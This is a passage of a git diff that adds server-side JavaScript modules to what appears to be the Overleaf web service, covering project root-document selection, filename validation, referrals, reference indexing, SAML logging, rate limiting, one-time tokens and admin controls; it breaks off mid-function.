ensureRootDocumentIsValid(projectId, callback) { + ProjectGetter.getProjectWithoutDocLines( + projectId, + function (error, project) { + if (error != null) { + return callback(error) + } + if (project == null) { + return callback(new Error('project not found')) + } + + if (project.rootDoc_id != null) { + ProjectEntityHandler.getDocPathFromProjectByDocId( + project, + project.rootDoc_id, + (err, docPath) => { + if (docPath) return callback() + ProjectEntityUpdateHandler.unsetRootDoc(projectId, () => + ProjectRootDocManager.setRootDocAutomatically( + projectId, + callback + ) + ) + } + ) + } else { + return ProjectRootDocManager.setRootDocAutomatically( + projectId, + callback + ) + } + } + ) + }, + + _sortFileList(listToSort, rootDirectory, callback) { + if (callback == null) { + callback = function () {} + } + return async.mapLimit( + listToSort, + 5, + (filePath, cb) => + fs.stat(Path.join(rootDirectory, filePath), function (err, stat) { + if (err != null) { + return cb(err) + } + return cb(null, { + size: stat.size, + path: filePath, + elements: filePath.split(Path.sep).length, + name: Path.basename(filePath), + }) + }), + function (err, files) { + if (err != null) { + return callback(err) + } + + return callback( + null, + _.map( + files.sort(ProjectRootDocManager._rootDocSort), + file => file.path + ) + ) + } + ) + }, + + _rootDocSort(a, b) { + // sort first by folder depth + if (a.elements !== b.elements) { + return a.elements - b.elements + } + // ensure main.tex is at the start of each folder + if (a.name === 'main.tex' && b.name !== 'main.tex') { + return -1 + } + if (a.name !== 'main.tex' && b.name === 'main.tex') { + return 1 + } + // prefer smaller files + if (a.size !== b.size) { + return a.size - b.size + } + // otherwise, use the full path name + return a.path.localeCompare(b.path) + }, +} + +module.exports = ProjectRootDocManager +module.exports.promises = promisifyAll(module.exports, { + without: ['_rootDocSort', 'setRootDocAutomaticallyInBackground'], + multiResult: { + findRootDocFileFromDirectory: ['path', 'content'], + }, +}) diff --git a/services/web/app/src/Features/Project/ProjectUpdateHandler.js b/services/web/app/src/Features/Project/ProjectUpdateHandler.js new file mode 100644 index 0000000..ad9b914 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectUpdateHandler.js @@ -0,0 +1,47 @@ +const { Project } = require('../../models/Project') +const { callbackify } = require('util') + +const ProjectUpdateHandler = { + async markAsUpdated(projectId, lastUpdatedAt, lastUpdatedBy) { + if (!lastUpdatedAt) { + lastUpdatedAt = new Date() + } + + const conditions = { + _id: projectId, + lastUpdated: { $lt: lastUpdatedAt }, + } + + const update = { + lastUpdated: lastUpdatedAt || new Date().getTime(), + lastUpdatedBy, + } + await Project.updateOne(conditions, update, {}).exec() + }, + + async markAsOpened(projectId) { + const conditions = { _id: projectId } + const update = { lastOpened: Date.now() } + await Project.updateOne(conditions, update, {}).exec() + }, + + async markAsInactive(projectId) { + const conditions = { _id: projectId } + const update = { active: false } + await Project.updateOne(conditions, update, {}).exec() + }, + + async markAsActive(projectId) { + const conditions = { _id: projectId } + const update = { active: true } + await Project.updateOne(conditions, update, {}).exec() + }, +} + +module.exports = { + markAsUpdated: callbackify(ProjectUpdateHandler.markAsUpdated), + markAsOpened: callbackify(ProjectUpdateHandler.markAsOpened), + markAsInactive: callbackify(ProjectUpdateHandler.markAsInactive), + markAsActive: callbackify(ProjectUpdateHandler.markAsActive), + promises: ProjectUpdateHandler, +} diff --git a/services/web/app/src/Features/Project/SafePath.js b/services/web/app/src/Features/Project/SafePath.js new file mode 100644 index 0000000..10267f7 --- /dev/null +++ b/services/web/app/src/Features/Project/SafePath.js @@ -0,0 +1,135 @@ +/* eslint-disable + max-len, + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This file is shared between the frontend and server code of web, so that +// filename validation is the same in both implementations. +// The logic in all copies must be kept in sync: +// app/src/Features/Project/SafePath.js +// frontend/js/ide/directives/SafePath.js +// frontend/js/features/file-tree/util/safe-path.js + +const load = function () { + let SafePath + // eslint-disable-next-line prefer-regex-literals + const BADCHAR_RX = new RegExp( + `\ +[\ +\\/\ +\\\\\ +\\*\ +\\u0000-\\u001F\ +\\u007F\ +\\u0080-\\u009F\ +\\uD800-\\uDFFF\ +]\ +`, + 'g' + ) + + // eslint-disable-next-line prefer-regex-literals + const BADFILE_RX = new RegExp( + `\ +(^\\.$)\ +|(^\\.\\.$)\ +|(^\\s+)\ +|(\\s+$)\ +`, + 'g' + ) + + // Put a block on filenames which match javascript property names, as they + // can cause exceptions where the code puts filenames into a hash. This is a + // temporary workaround until the code in other places is made safe against + // property names. + // + // The list of property names is taken from + // ['prototype'].concat(Object.getOwnPropertyNames(Object.prototype)) + // eslint-disable-next-line prefer-regex-literals + const BLOCKEDFILE_RX = new RegExp(`\ +^(\ +prototype\ +|constructor\ +|toString\ +|toLocaleString\ +|valueOf\ +|hasOwnProperty\ +|isPrototypeOf\ +|propertyIsEnumerable\ +|__defineGetter__\ +|__lookupGetter__\ +|__defineSetter__\ +|__lookupSetter__\ +|__proto__\ +)$\ +`) + + const MAX_PATH = 1024 // Maximum path length, in characters. This is fairly arbitrary. + + return (SafePath = { + // convert any invalid characters to underscores in the given filename + clean(filename) { + filename = filename.replace(BADCHAR_RX, '_') + // for BADFILE_RX replace any matches with an equal number of underscores + filename = filename.replace(BADFILE_RX, match => + new Array(match.length + 1).join('_') + ) + // replace blocked filenames 'prototype' with '@prototype' + filename = filename.replace(BLOCKEDFILE_RX, '@$1') + return filename + }, + + // returns whether the filename is 'clean' (does not contain any invalid + // characters or reserved words) + isCleanFilename(filename) { + return ( + SafePath.isAllowedLength(filename) && + !filename.match(BADCHAR_RX) && + !filename.match(BADFILE_RX) + ) + }, + + isBlockedFilename(filename) { + return BLOCKEDFILE_RX.test(filename) + }, + + // returns whether a full path is 'clean' - e.g. is a full or relative path + // that points to a file, and each element passes the rules in 'isCleanFilename' + isCleanPath(path) { + const elements = path.split('/') + + const lastElementIsEmpty = elements[elements.length - 1].length === 0 + if (lastElementIsEmpty) { + return false + } + + for (const element of Array.from(elements)) { + if (element.length > 0 && !SafePath.isCleanFilename(element)) { + return false + } + } + + // check for a top-level reserved name + if (BLOCKEDFILE_RX.test(path.replace(/^\/?/, ''))) { + return false + } // remove leading slash if present + + return true + }, + + isAllowedLength(pathname) { + return pathname.length > 0 && pathname.length <= MAX_PATH + }, + }) +} + +module.exports = load() diff --git a/services/web/app/src/Features/Project/types.d.ts b/services/web/app/src/Features/Project/types.d.ts new file mode 100644 index 0000000..c59f551 --- /dev/null +++ b/services/web/app/src/Features/Project/types.d.ts @@ -0,0 +1,38 @@ +import express from 'express' +import { + GetProjectsRequestBody, + GetProjectsResponseBody, +} from '../../../../types/project/dashboard/api' + +export type GetProjectsRequest = express.Request< + unknown, + unknown, + GetProjectsRequestBody, + unknown +> + +export type GetProjectsResponse = express.Response<GetProjectsResponseBody> + +export type MongoProject = { + _id: string + name: string + lastUpdated: Date + lastUpdatedBy: string + publicAccesLevel: string + archived: string[] + trashed: boolean + owner_ref: string + tokens: { + readOnly: string[] + readAndWrite: string[] + readAndWritePrefix: string[] + }[] +} + +export type AllUsersProjects = { + owned: MongoProject[] + readAndWrite: MongoProject[] + readOnly: MongoProject[] + tokenReadAndWrite: MongoProject[] + tokenReadOnly: MongoProject[] +} diff --git a/services/web/app/src/Features/Publishers/PublishersGetter.js b/services/web/app/src/Features/Publishers/PublishersGetter.js new file mode 100644 index 0000000..9167a70 --- /dev/null +++ b/services/web/app/src/Features/Publishers/PublishersGetter.js @@ -0,0 +1,42 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { fetchJson } = require('@overleaf/fetch-utils') +const { callbackify } = require('@overleaf/promise-utils') +const UserMembershipsHandler = require('../UserMembership/UserMembershipsHandler') +const UserMembershipEntityConfigs = require('../UserMembership/UserMembershipEntityConfigs') + +async function getManagedPublishers(userId) { + return await UserMembershipsHandler.promises.getEntitiesByUser( + UserMembershipEntityConfigs.publisher, + userId + ) +} + +async function fetchV1Data(publisher) { + const url = `${Settings.apis.v1.url}/api/v2/brands/${publisher.slug}` + try { + const data = await fetchJson(url, { + basicAuth: { + user: Settings.apis.v1.user, + password: Settings.apis.v1.pass, + }, + signal: AbortSignal.timeout(Settings.apis.v1.timeout), + }) + + publisher.name = data?.name + publisher.partner = data?.partner + } catch (error) { + logger.err( + { model: 'Publisher', slug: publisher.slug, error }, + '[fetchV1DataError]' + ) + } +} + +module.exports = { + getManagedPublishers: callbackify(getManagedPublishers), + promises: { + getManagedPublishers, + fetchV1Data, + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalAllocator.js b/services/web/app/src/Features/Referal/ReferalAllocator.js new file mode 100644 index 0000000..bf42fb8 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalAllocator.js @@ -0,0 +1,48 @@ +const OError = require('@overleaf/o-error') +const { User } = require('../../models/User') +const FeaturesUpdater = require('../Subscription/FeaturesUpdater') +const { callbackify } = require('@overleaf/promise-utils') + +async function allocate(referalId, newUserId, referalSource, referalMedium) { + if (referalId == null) { + return null + } + + const query = { referal_id: referalId } + const user = await User.findOne(query, { _id: 1 }).exec() + if (user == null || user._id == null) { + return null + } + + if (referalSource === 'bonus') { + try { + await User.updateOne( + query, + { + $push: { + refered_users: newUserId, + }, + $inc: { + refered_user_count: 1, + }, + }, + {} + ).exec() + } catch (err) { + OError.tag(err, 'something went wrong allocating referal', { + referalId, + newUserId, + }) + throw err + } + + return await FeaturesUpdater.promises.refreshFeatures(user._id, 'referral') + } +} + +module.exports = { + allocate: callbackify(allocate), + promises: { + allocate, + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalConnect.mjs b/services/web/app/src/Features/Referal/ReferalConnect.mjs new file mode 100644 index 0000000..7b65151 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalConnect.mjs @@ -0,0 +1,52 @@ +export default { + use(req, res, next) { + if (req.query != null) { + if (req.query.referal != null) { + req.session.referal_id = req.query.referal + } else if (req.query.r != null) { + // Short hand for referal + req.session.referal_id = req.query.r + } else if (req.query.fb_ref != null) { + req.session.referal_id = req.query.fb_ref + } + + if (req.query.rm != null) { + // referal medium e.g. twitter, facebook, email + switch (req.query.rm) { + case 'fb': + req.session.referal_medium = 'facebook' + break + case 't': + req.session.referal_medium = 'twitter' + break + case 'gp': + req.session.referal_medium = 'google_plus' + break + case 'e': + req.session.referal_medium = 'email' + break + case 'd': + req.session.referal_medium = 'direct' + break + } + } + + if (req.query.rs != null) { + // referal source e.g. project share, bonus + switch (req.query.rs) { + case 'b': + req.session.referal_source = 'bonus' + break + case 'ps': + req.session.referal_source = 'public_share' + break + case 'ci': + req.session.referal_source = 'collaborator_invite' + break + } + } + } + + next() + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalController.mjs b/services/web/app/src/Features/Referal/ReferalController.mjs new file mode 100644 index 0000000..8315ac7 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalController.mjs @@ -0,0 +1,17 @@ +import ReferalHandler from './ReferalHandler.mjs' +import SessionManager from '../Authentication/SessionManager.js' + +export default { + bonus(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + ReferalHandler.getReferedUsers(userId, (err, { referedUserCount }) => { + if (err) { + next(err) + } else { + res.render('referal/bonus', { + refered_user_count: referedUserCount, + }) + } + }) + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalFeatures.js b/services/web/app/src/Features/Referal/ReferalFeatures.js new file mode 100644 index 0000000..7f3e732 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalFeatures.js @@ -0,0 +1,48 @@ +const _ = require('lodash') +const { callbackify } = require('util') +const { User } = require('../../models/User') +const Settings = require('@overleaf/settings') + +const ReferalFeatures = { + async getBonusFeatures(userId) { + const query = { _id: userId } + const user = await User.findOne(query, { refered_user_count: 1 }).exec() + + if (user == null) { + throw new Error(`user not found ${userId} for assignBonus`) + } + + if (user.refered_user_count != null && user.refered_user_count > 0) { + const newFeatures = ReferalFeatures._calculateFeatures(user) + return newFeatures + } + + return {} + }, + + _calculateFeatures(user) { + const bonusLevel = ReferalFeatures._getBonusLevel(user) + return ( + (Settings.bonus_features != null + ? Settings.bonus_features[`${bonusLevel}`] + : undefined) || {} + ) + }, + + _getBonusLevel(user) { + let highestBonusLevel = 0 + _.forEach(_.keys(Settings.bonus_features), function (level) { + const levelIsLessThanUser = level <= user.refered_user_count + const levelIsMoreThanCurrentHighest = level >= highestBonusLevel + if (levelIsLessThanUser && levelIsMoreThanCurrentHighest) { + return (highestBonusLevel = level) + } + }) + return highestBonusLevel + }, +} + +module.exports = { + getBonusFeatures: callbackify(ReferalFeatures.getBonusFeatures), + promises: ReferalFeatures, +} diff --git a/services/web/app/src/Features/Referal/ReferalHandler.mjs b/services/web/app/src/Features/Referal/ReferalHandler.mjs new file mode 100644 index 0000000..1d389bb --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalHandler.mjs @@ -0,0 +1,17 @@ +import { callbackify } from '@overleaf/promise-utils' +import { User } from '../../models/User.js' + +async function getReferedUsers(userId) { + const projection = { refered_users: 1, refered_user_count: 1 } + const user = await User.findById(userId, projection).exec() + const referedUsers = user.refered_users || [] + const referedUserCount = user.refered_user_count || referedUsers.length + return { referedUsers, referedUserCount } +} + +export default { + getReferedUsers: callbackify(getReferedUsers), + promises: { + getReferedUsers, + }, +} diff --git a/services/web/app/src/Features/References/ReferencesController.mjs b/services/web/app/src/Features/References/ReferencesController.mjs new file mode 100644 index 0000000..378f096 --- /dev/null +++ b/services/web/app/src/Features/References/ReferencesController.mjs @@ -0,0 +1,53 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import ReferencesHandler from './ReferencesHandler.mjs' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import { OError } from '../Errors/Errors.js' + +let ReferencesController + +export default ReferencesController = { + indexAll(req, res, next) { + const projectId = req.params.Project_id + const { shouldBroadcast } = req.body + return ReferencesHandler.indexAll(projectId, function (error, data) { + if (error) { + OError.tag(error, 'failed to index references', { projectId }) + return next(error) + } + return ReferencesController._handleIndexResponse( + req, + res, + projectId, + shouldBroadcast, + true, + data + ) + }) + }, + + _handleIndexResponse(req, res, projectId, shouldBroadcast, isAllDocs, data) { + if (data == null || data.keys == null) { + return res.json({ projectId, keys: [] }) + } + if (shouldBroadcast) { + EditorRealTimeController.emitToRoom( + projectId, + 'references:keys:updated', + data.keys, + isAllDocs + ) + } + return res.json(data) + }, +} diff --git a/services/web/app/src/Features/References/ReferencesHandler.mjs b/services/web/app/src/Features/References/ReferencesHandler.mjs new file mode 100644 index 0000000..9ff61f2 --- /dev/null +++ b/services/web/app/src/Features/References/ReferencesHandler.mjs @@ -0,0 +1,221 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' +import request from 'request' +import settings from '@overleaf/settings' +import Features from '../../infrastructure/Features.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import UserGetter from '../User/UserGetter.js' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import _ from 'lodash' +import Async from 'async' +import Errors from '../Errors/Errors.js' +import { promisify } from '@overleaf/promise-utils' +import HistoryURLHelper from '../History/HistoryURLHelper.js' + +let ReferencesHandler + +if (!Features.hasFeature('references')) { + logger.debug('references search not enabled') +} + +export default ReferencesHandler = { + _buildDocUrl(projectId, docId) { + return { + url: `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}/raw`, + } + }, + + _findBibFileRefs(project) { + const fileRefs = [] + function _process(folder) { + _.forEach(folder.fileRefs || [], function (file) { + if ( + __guard__(file != null ? file.name : undefined, x1 => + x1.match(/^.*\.bib$/) + ) + ) { + return fileRefs.push(file) + } + }) + return _.forEach(folder.folders || [], folder => _process(folder)) + } + _.forEach(project.rootFolder || [], rootFolder => _process(rootFolder)) + return fileRefs + }, + + _findBibDocIds(project) { + const ids = [] + function _process(folder) { + _.forEach(folder.docs || [], function (doc) { + if ( + __guard__(doc != null ? doc.name : undefined, x1 => + x1.match(/^.*\.bib$/) + ) + ) { + return ids.push(doc._id) + } + }) + return _.forEach(folder.folders || [], folder => _process(folder)) + } + _.forEach(project.rootFolder || [], rootFolder => _process(rootFolder)) + return ids + }, + + _isFullIndex(project, callback) { + if (callback == null) { + callback = function () {} + } + return UserGetter.getUser( + project.owner_ref, + { features: true }, + function (err, owner) { + if (err != null) { + return callback(err) + } + const features = owner != null ? owner.features : undefined + return callback( + null, + (features != null ? features.references : undefined) === true || + (features != null ? features.referencesSearch : undefined) === true + ) + } + ) + }, + + indexAll(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectGetter.getProject( + projectId, + { rootFolder: true, owner_ref: 1, 'overleaf.history.id': 1 }, + function (err, project) { + if (err) { + OError.tag(err, 'error finding project', { + projectId, + }) + return callback(err) + } + if (!project) { + return callback( + new Errors.NotFoundError(`project does not exist: ${projectId}`) + ) + } + logger.debug({ projectId }, 'indexing all bib files in project') + const docIds = ReferencesHandler._findBibDocIds(project) + const fileRefs = ReferencesHandler._findBibFileRefs(project) + return ReferencesHandler._doIndexOperation( + projectId, + project, + docIds, + fileRefs, + callback + ) + } + ) + }, + + _doIndexOperation(projectId, project, docIds, fileRefs, callback) { + if (!Features.hasFeature('references')) { + return callback() + } + const historyId = project?.overleaf?.history?.id + if (!historyId) { + return callback( + new OError('project does not have a history id', { projectId }) + ) + } + return ReferencesHandler._isFullIndex(project, function (err, isFullIndex) { + if (err) { + OError.tag(err, 'error checking whether to do full index', { + projectId, + }) + return callback(err) + } + logger.debug( + { projectId, docIds }, + 'flushing docs to mongo before calling references service' + ) + return Async.series( + docIds.map( + docId => cb => + DocumentUpdaterHandler.flushDocToMongo(projectId, docId, cb) + ), + function (err) { + // continue + if (err) { + OError.tag(err, 'error flushing docs to mongo', { + projectId, + docIds, + }) + return callback(err) + } + const bibDocUrls = docIds.map(docId => + ReferencesHandler._buildDocUrl(projectId, docId) + ) + const bibFileUrls = fileRefs.map(fileRef => + HistoryURLHelper.projectHistoryURLWithFilestoreFallback( + settings, + projectId, + historyId, + fileRef, + 'bibFileUrls' + ) + ) + const sourceURLs = bibDocUrls.concat(bibFileUrls) + return request.post( + { + url: `${settings.apis.references.url}/project/${projectId}/index`, + json: { + docUrls: sourceURLs.map(item => item.fallbackURL || item.url), + sourceURLs, + fullIndex: isFullIndex, + }, + }, + function (err, res, data) { + if (err) { + OError.tag(err, 'error communicating with references api', { + projectId, + }) + return callback(err) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug({ projectId }, 'got keys from references api') + return callback(null, data) + } else { + err = new Error( + `references api responded with non-success code: ${res.statusCode}` + ) + return callback(err) + } + } + ) + } + ) + }) + }, +} + +ReferencesHandler.promises = { + indexAll: promisify(ReferencesHandler.indexAll), +} + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? transform(value) + : undefined +} diff --git a/services/web/app/src/Features/SamlLog/SamlLogHandler.js b/services/web/app/src/Features/SamlLog/SamlLogHandler.js new file mode 100644 index 0000000..e8ddd68 --- /dev/null +++ b/services/web/app/src/Features/SamlLog/SamlLogHandler.js @@ -0,0 +1,85 @@ +const { SamlLog } = require('../../models/SamlLog') +const SessionManager = require('../Authentication/SessionManager') +const logger = require('@overleaf/logger') +const { err: errSerializer } = require('@overleaf/logger/serializers') +const { callbackify } = require('util') +const Settings = require('@overleaf/settings') + +const ALLOWED_PATHS = Settings.saml?.logAllowList || ['/saml/'] + +async function log(req, data, samlAssertion) { + let providerId, sessionId + + data = data || {} + + try { + const { path, query } = req + if (!ALLOWED_PATHS.some(allowedPath => path.startsWith(allowedPath))) { + return + } + + const { saml } = req.session + const userId = SessionManager.getLoggedInUserId(req.session) + + providerId = (req.session.saml?.universityId || '').toString() + sessionId = (req.sessionID || '').toString().substr(0, 8) + + const samlLog = new SamlLog() + samlLog.providerId = providerId + samlLog.sessionId = sessionId + samlLog.path = path + samlLog.userId = userId + data.query = query + data.samlSession = saml + + if (data.error instanceof Error) { + const errSerialized = errSerializer(data.error) + if (data.error.tryAgain) { + errSerialized.tryAgain = data.error.tryAgain + } + req.logger.addFields({ providerId, sessionId, userId }) + data.error = errSerialized + } + + if (samlAssertion) { + const samlAssertionForLog = { + assertionXml: samlAssertion.getAssertionXml(), + responseXml: samlAssertion.getSamlResponseXml(), + assertionJsonExtended: req.user_info, + } + samlLog.samlAssertion = JSON.stringify(samlAssertionForLog) + } + + if (data.error) { + data.body = {} + if (req.body.email) { + data.body.email = req.body.email + } + if (req.body.SAMLResponse) { + data.body.SAMLResponse = req.body.SAMLResponse + } + } + + try { + samlLog.jsonData = JSON.stringify(data) + } catch (err) { + // log but continue on data errors + logger.error( + { err, sessionId, providerId }, + 'SamlLog JSON.stringify Error' + ) + } + await samlLog.save() + } catch (err) { + logger.error({ err, sessionId, providerId }, 'SamlLog Error') + } +} + +const SamlLogHandler = { + log: callbackify(log), + promises: { + log, + }, +} + +module.exports = SamlLogHandler diff --git a/services/web/app/src/Features/Security/LoginRateLimiter.js b/services/web/app/src/Features/Security/LoginRateLimiter.js new file mode 100644 index 0000000..58a351d --- /dev/null +++ b/services/web/app/src/Features/Security/LoginRateLimiter.js @@ -0,0 +1,45 @@ +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const { promisifyAll } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') + +const rateLimiterLoginEmail = new RateLimiter( + 'login', + Settings.rateLimit?.login?.email || { + points: 10, + duration: 120, + } +) + +function processLoginRequest(email, callback) { + rateLimiterLoginEmail + .consume(email.trim().toLowerCase(), 1, { method: 'email' }) + .then(() => { + callback(null, true) + }) + .catch(err => { + if (err instanceof Error) { + callback(err) + } else { + callback(null, false) + } + }) +} + +function recordSuccessfulLogin(email, callback) { + rateLimiterLoginEmail + .delete(email) + .then(() => { + callback() + }) + .catch(err => { + callback(err) + }) +} + +const LoginRateLimiter = { + processLoginRequest, + recordSuccessfulLogin, +} +LoginRateLimiter.promises = promisifyAll(LoginRateLimiter) + +module.exports = LoginRateLimiter diff --git a/services/web/app/src/Features/Security/OneTimeTokenHandler.js b/services/web/app/src/Features/Security/OneTimeTokenHandler.js new file mode 100644 index 0000000..ef49c68 --- /dev/null +++ b/services/web/app/src/Features/Security/OneTimeTokenHandler.js @@ -0,0 +1,137 @@ +const crypto = require('crypto') +const { db } = require('../../infrastructure/mongodb') +const Errors = require('../Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') +const { callbackify } = require('util') + +const ONE_HOUR_IN_S = 60 * 60 + +async function peekValueFromToken(use, token) { + const tokenDoc = await db.tokens.findOneAndUpdate( + { + use, + token, + expiresAt: { $gt: new Date() }, + usedAt: { $exists: false }, + peekCount: { $not: { $gte: OneTimeTokenHandler.MAX_PEEKS } }, + }, + { + $inc: { peekCount: 1 }, + }, + { + returnDocument: 'after', + } + ) + if (!tokenDoc) { + throw new Errors.NotFoundError('no token found') + } + // The allowed number of peaks will be 1 less than OneTimeTokenHandler.MAX_PEEKS + // since the updated doc is returned after findOneAndUpdate above + const remainingPeeks = OneTimeTokenHandler.MAX_PEEKS - tokenDoc.peekCount + + return { data: tokenDoc.data, remainingPeeks } +} + +const OneTimeTokenHandler = { + MAX_PEEKS: 4, + + getNewToken(use, data, options, callback) { + // options is optional + if (!options) { + options = {} + } + if (typeof options === 'function') { + callback = options + options = {} + } + const expiresIn = options.expiresIn || ONE_HOUR_IN_S + const createdAt = new Date() + const expiresAt = new Date(createdAt.getTime() + expiresIn * 1000) + const token = crypto.randomBytes(32).toString('hex') + db.tokens.insertOne( + { + use, + token, + data, + createdAt, + expiresAt, + }, + function (error) { + if (error) { + return callback(error) + } + callback(null, token) + } + ) + }, + + getValueFromTokenAndExpire(use, token, callback) { + const now = new Date() + db.tokens.findOneAndUpdate( + { + use, + token, + expiresAt: { $gt: now }, + usedAt: { $exists: false }, + peekCount: { $not: { $gte: OneTimeTokenHandler.MAX_PEEKS } }, + }, + { + $set: { + usedAt: now, + }, + }, + function (error, token) { + if (error) { + return callback(error) + } + if (!token) { + return callback(new Errors.NotFoundError('no token found')) + } + callback(null, token.data) + } + ) + }, + + peekValueFromToken: callbackify(peekValueFromToken), + + expireToken(use, token, callback) { + const now = new Date() + db.tokens.updateOne( + { + use, + token, + }, + { + $set: { + usedAt: now, + }, + }, + error => { + callback(error) + } + ) + }, + + expireAllTokensForUser(userId, use, callback) { + const now = new Date() + db.tokens.updateMany( + { + use, + 'data.user_id': userId.toString(), + usedAt: { $exists: false }, + }, + { + $set: { + usedAt: now, + }, + }, + error => { + callback(error) + } + ) + }, +} + +OneTimeTokenHandler.promises = promisifyAll(OneTimeTokenHandler) + +module.exports = OneTimeTokenHandler diff --git a/services/web/app/src/Features/Security/RateLimiterMiddleware.js b/services/web/app/src/Features/Security/RateLimiterMiddleware.js new file mode 100644 index 0000000..571eb8a --- /dev/null +++ b/services/web/app/src/Features/Security/RateLimiterMiddleware.js @@ -0,0 +1,91 @@ +const logger = require('@overleaf/logger') +const SessionManager = require('../Authentication/SessionManager') +const LoginRateLimiter = require('./LoginRateLimiter') +const settings = require('@overleaf/settings') + +/** + * Return a rate limiting middleware + * + * Pass an array of opts.params to segment this based on parameters in the + * request URL, e.g.: + * + * app.get "/project/:project_id", RateLimiterMiddleware.rateLimit( + * rateLimiter, params: ["project_id"] + * ) + * + * will rate limit each project_id separately. + * + * Unique clients are identified by user_id if logged in, and IP address if not. + * The method label is used to identify this in our metrics. + */ +function rateLimit(rateLimiter, opts = {}) { + const getUserId = + opts.getUserId || (req => SessionManager.getLoggedInUserId(req.session)) + return function (req, res, next) { + const clientId = opts.ipOnly ? req.ip : getUserId(req) || req.ip + const method = clientId === req.ip ? 'ip' : 'userId' + + if ( + settings.smokeTest && + settings.smokeTest.userId && + settings.smokeTest.userId.toString() === clientId.toString() + ) { + // ignore smoke test user + return next() + } + + let key = clientId + if (!opts.ipOnly) { + const params = (opts.params || []).map(p => req.params[p]) + params.push(clientId) + key = params.join(':') + } + + rateLimiter + .consume(key, 1, { method }) + .then(() => next()) + .catch(err => { + if (err instanceof Error) { + next(err) + } else { + res.status(429) // Too many requests + res.write('Rate limit reached, please try again later') + res.end() + } + }) + } +} + +function loginRateLimitEmail(emailField = 'email') { + return function (req, res, next) { + const email = req.body[emailField] + if (!email) { + return next() + } + LoginRateLimiter.processLoginRequest(email, (err, isAllowed) => { + if (err) { + return next(err) + } + if (isAllowed) { + next() + } else { + logger.warn({ email }, 'rate limit exceeded') + res.status(429) // Too many requests + res.json({ + message: { + type: 'error', + text: req.i18n.translate('to_many_login_requests_2_mins'), + key: 'to-many-login-requests-2-mins', + }, + }) + } + }) + } +} + +const RateLimiterMiddleware = { + rateLimit, + loginRateLimitEmail, +} + +module.exports = RateLimiterMiddleware diff --git a/services/web/app/src/Features/ServerAdmin/AdminController.js b/services/web/app/src/Features/ServerAdmin/AdminController.js new file mode 100644 index 0000000..261a5c2 --- /dev/null +++ b/services/web/app/src/Features/ServerAdmin/AdminController.js @@ -0,0 +1,97 @@ +const logger = require('@overleaf/logger') +const http = require('http') +const https = require('https') +const Settings = require('@overleaf/settings') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const SystemMessageManager = require('../SystemMessages/SystemMessageManager') + +const AdminController = { + _sendDisconnectAllUsersMessage: delay => { + return EditorRealTimeController.emitToAll( + 'forceDisconnect', + 'Sorry, we are performing a quick update to the editor and need to close it down. Please refresh the page to continue.', + delay + ) + }, + index: (req, res, next) => { + let url + const openSockets = {} + for (url in http.globalAgent.sockets) { + openSockets[`http://${url}`] = http.globalAgent.sockets[url].map( + socket => socket._httpMessage.path + ) + } + + for (url in https.globalAgent.sockets) { + openSockets[`https://${url}`] = https.globalAgent.sockets[url].map( + socket => socket._httpMessage.path + ) + } + + SystemMessageManager.getMessagesFromDB(function (error, systemMessages) { + if (error) { + return next(error) + } + res.render('admin/index', { + title: 'System Admin', + openSockets, + systemMessages, + }) + }) + }, + + disconnectAllUsers: (req, res) => { + logger.warn('disconecting everyone') + const delay = (req.query && req.query.delay) > 0 ? req.query.delay : 10 + AdminController._sendDisconnectAllUsersMessage(delay) + res.redirect('/admin#open-close-editor') + }, + + openEditor(req, res) { + logger.warn('opening editor') + Settings.editorIsOpen = true + res.redirect('/admin#open-close-editor') + }, + + closeEditor(req, res) { + logger.warn('closing editor') + Settings.editorIsOpen = req.body.isOpen + res.redirect('/admin#open-close-editor') + }, + + flushProjectToTpds(req, res, next) { + TpdsProjectFlusher.flushProjectToTpds(req.body.project_id, error => { + if (error) { + return next(error) + } + res.sendStatus(200) + }) + }, + + pollDropboxForUser(req, res) { + const { user_id: userId } = req.body + TpdsUpdateSender.pollDropboxForUser(userId, () => res.sendStatus(200)) + }, + + createMessage(req, res, next) { + 